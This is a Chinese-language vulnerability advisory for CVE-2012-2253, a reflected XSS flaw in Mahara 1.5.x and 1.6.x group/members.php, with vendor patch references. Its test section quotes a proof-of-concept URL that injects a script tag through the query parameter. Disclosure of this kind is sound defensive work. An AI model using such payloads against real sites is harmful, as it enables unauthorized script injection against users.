Mahara group/members.php XSS漏洞

发布日期:2012-11-23
更新日期:2012-11-27

受影响系统:
mahara mahara 1.6.x
mahara mahara 1.5.x
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2012-2253

Mahara是一个开源的电子文件夹、网络日志、履历表生成器和社会联网系统。

Mahara 1.6.x、1.5.x在group/members.php的实现上存在XSS漏洞,可允许远程攻击者注入任意Web脚本或HTML。

<*来源:vendor
 
  链接:http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2253
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

vendor ()提供了如下测试方法:
Original report:

"if logged in and go to link

http://<wwwroot>/group/members.php?id=2&query=123'%22%3E%3Cscript%3Ealert(1)%3C/script%3Exss

then xss"

参考自
https://bugs.launchpad.net/mahara/+bug/1079498

建议:
--------------------------------------------------------------------------------
厂商补丁:

mahara
------
https://mahara.org/tracker/
https://bugs.launchpad.net/mahara/+bug/1079498

xss

相关推荐